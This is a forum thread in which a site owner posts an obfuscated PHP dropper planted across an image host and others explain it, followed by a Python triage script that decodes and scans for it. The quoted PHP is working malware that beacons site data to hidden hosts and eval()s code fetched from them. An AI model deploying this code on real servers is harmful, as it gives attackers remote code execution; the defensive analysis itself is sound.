what hacker do with this php script

Status
Not open for further replies.

Cheetah

Active Member
My image hosting site got hacked. The hacker placed .htaccess files and some PHP files with random names. He inserted the files in almost every image folder, so I would like to know what the output of the PHP script is.

Code:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);$z="/?".base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".e.".base64_encode($i).".".base64_encode($j);$f=base64_decode("cnNzbmV3cy53cw==");if (basename($c)==basename($i)&&isset($_REQUEST["q"])&&md5($_REQUEST["q"])=="72951d9f890543cc69aa7aa29a5b0609") $f=$_REQUEST["id"];if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);$o=curl_exec($cu);curl_close($cu);eval($o);};die(); ?>

Upon execution of the PHP file, I am getting only a blank page. I think he is getting info about my site. Someone please explain it to me.
 
16 comments
Seen this before.
Isn't a shell, it's a piece of ad code which shows a malicious virus-infected ad.
 
I tried opening those files in Firefox. I mean the files on the server, but I'm only getting a blank page. I am not going to take the risk; I'm deleting all those files.
 
I guess you last 3 posters didn't bother reading my post then?
lol

Unless, that is, you mean "how did it get there". In that case, probably someone with access via an RFU exploit.
 
Hi mate, this part of the code

Code:
<? error_reporting(0);$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER

is basically showing

your host name, server name, requested URL, referrer, user agent, the filename, stuff like that. It can be harmful depending on what it is being used for.

It's encoding the text in base64, encrypted using functions declared by the alphabet characters A-I.

What it does is send people to a false PHP page and redirect them to another one.

This attack is being used on TONS of websites,

as well as this same script being used in public:

http://pastebin.com/m6649b7c3


Also read this:

http://wordpress.org/support/topic/220523
 
I reversed this script for demon some time back.

What it does:
- Send some site info to website X
- Retrieve php code from website X
- eval() (execute) the retrieved php code

Edit: So basically this can be used as a remote virus or automated shell.
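The two posts above describe the same behaviour: the script base64-encodes request metadata into a URL, fetches PHP from a hidden hostname, and eval()s whatever comes back. The following Python triage helper is an added example, not code from this thread or from any poster. It never executes the PHP; it decodes the base64 literals in the posted script statically, rebuilds the hostnames the script would contact, shows what one beacon hit reveals to the remote server (the `$z` layout from the script), and flags other files with the same structure so a site owner can find the copies dropped into every image folder. `SAMPLE_PHP` is trimmed from the script quoted in the thread; the `SAMPLE_SERVER` values, the file name `xk3j.php` and its path are constructed for the demonstration.

```python
"""Static triage of an obfuscated PHP dropper (added example, not from the thread)."""
import base64
import os
import re

# Constructed sample: the dropper quoted in the thread, trimmed to the base64
# literals and the sinks that matter for triage. Nothing here is executed.
SAMPLE_PHP = r'''<? error_reporting(0);$f=base64_decode("cnNzbmV3cy53cw==");
if((include(base64_decode("aHR0cDovL2Fkcy4=").$f.$z)));
else if($c=file_get_contents(base64_decode("aHR0cDovLzcu").$f.$z))eval($c);
else{$cu=curl_init(base64_decode("aHR0cDovLzcxLg==").$f.$z);eval($o);};die(); ?>'''

B64_LITERAL = re.compile(r'base64_decode\(\s*"([A-Za-z0-9+/=]+)"\s*\)')
# Sinks that, combined with decoded URLs, mark remote code execution.
SINKS = ("eval(", "include(", "file_get_contents(", "curl_init(", "error_reporting(0)")

# Order of the $_SERVER fields packed into $z in the posted script; the literal
# "e" segment is a marker the script inserts between REMOTE_ADDR and SCRIPT_FILENAME.
BEACON_FIELDS = ["HTTP_HOST", "SERVER_NAME", "REQUEST_URI", "PHP_SELF",
                 "QUERY_STRING", "HTTP_REFERER", "HTTP_USER_AGENT", "REMOTE_ADDR",
                 "e", "SCRIPT_FILENAME", "HTTP_ACCEPT_LANGUAGE"]

# Constructed request values standing in for a real hit on the dropped file.
SAMPLE_SERVER = {
    "HTTP_HOST": "img.example.test", "SERVER_NAME": "img.example.test",
    "REQUEST_URI": "/images/2009/xk3j.php", "PHP_SELF": "/images/2009/xk3j.php",
    "QUERY_STRING": "", "HTTP_REFERER": "",
    "HTTP_USER_AGENT": "Mozilla/5.0 (constructed)", "REMOTE_ADDR": "192.0.2.10",
    "SCRIPT_FILENAME": "/var/www/images/2009/xk3j.php", "HTTP_ACCEPT_LANGUAGE": "en-US",
}


def decode_literals(php_source):
    """Return (encoded, decoded) pairs for every base64_decode("...") literal."""
    out = []
    for enc in B64_LITERAL.findall(php_source):
        try:
            dec = base64.b64decode(enc, validate=True).decode("utf-8")
        except (ValueError, UnicodeDecodeError):
            dec = "<not valid base64/utf-8>"
        out.append((enc, dec))
    return out


def find_sinks(php_source):
    """List the dangerous calls present, in SINKS order."""
    return [s for s in SINKS if s in php_source]


def reconstruct_callback_hosts(php_source):
    """Join each decoded 'http://<label>.' prefix with the decoded bare domain,
    mirroring how the script concatenates base64_decode(...) . $f before $z."""
    decoded = [d for _, d in decode_literals(php_source)]
    domains = [d for d in decoded if not d.startswith("http")]
    prefixes = [d for d in decoded if d.startswith("http://")]
    return [p + dom for p in prefixes for dom in domains]


def build_beacon_path(server_vars):
    """Mirror the $z construction: '/?' then base64 of each field joined by '.'."""
    parts = ["e" if name == "e" else
             base64.b64encode(server_vars.get(name, "").encode()).decode()
             for name in BEACON_FIELDS]
    return "/?" + ".".join(parts)


def decode_beacon_path(path):
    """What the remote server learns from one hit; '.' is safe as a separator
    because it is not in the base64 alphabet."""
    body = path[2:] if path.startswith("/?") else path
    segments = body.split(".")
    if len(segments) != len(BEACON_FIELDS):
        raise ValueError("unexpected beacon layout: %d segments" % len(segments))
    return {name: base64.b64decode(seg).decode("utf-8", "replace")
            for name, seg in zip(BEACON_FIELDS, segments) if name != "e"}


def is_suspicious(php_source):
    """Same structure as the dropper: hidden URL literal plus an eval/include sink."""
    urls = [d for _, d in decode_literals(php_source) if d.startswith("http")]
    return bool(urls) and any(s in php_source for s in ("eval(", "include("))


def scan_tree(root):
    """Walk a web root and return paths of .php files matching is_suspicious()."""
    hits = []
    for dirpath, _, files in os.walk(root):
        for name in files:
            if name.lower().endswith(".php"):
                full = os.path.join(dirpath, name)
                with open(full, "r", errors="replace") as fh:
                    if is_suspicious(fh.read()):
                        hits.append(full)
    return hits


if __name__ == "__main__":
    for enc, dec in decode_literals(SAMPLE_PHP):
        print("%-20s -> %s" % (enc, dec))
    print("sinks:", find_sinks(SAMPLE_PHP))
    print("callback hosts:", reconstruct_callback_hosts(SAMPLE_PHP))
    print("beacon reveals:", decode_beacon_path(build_beacon_path(SAMPLE_SERVER)))
```

Run it with no arguments to see the decoded literals and the beacon fields for the constructed request; point `scan_tree("/path/to/webroot")` at a real document root to list dropped copies before deleting them. The script only accepts an attacker-chosen `id` host when the `q` parameter hashes to the hard-coded MD5, so the decoded default domain is the one your outbound logs would normally show.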
 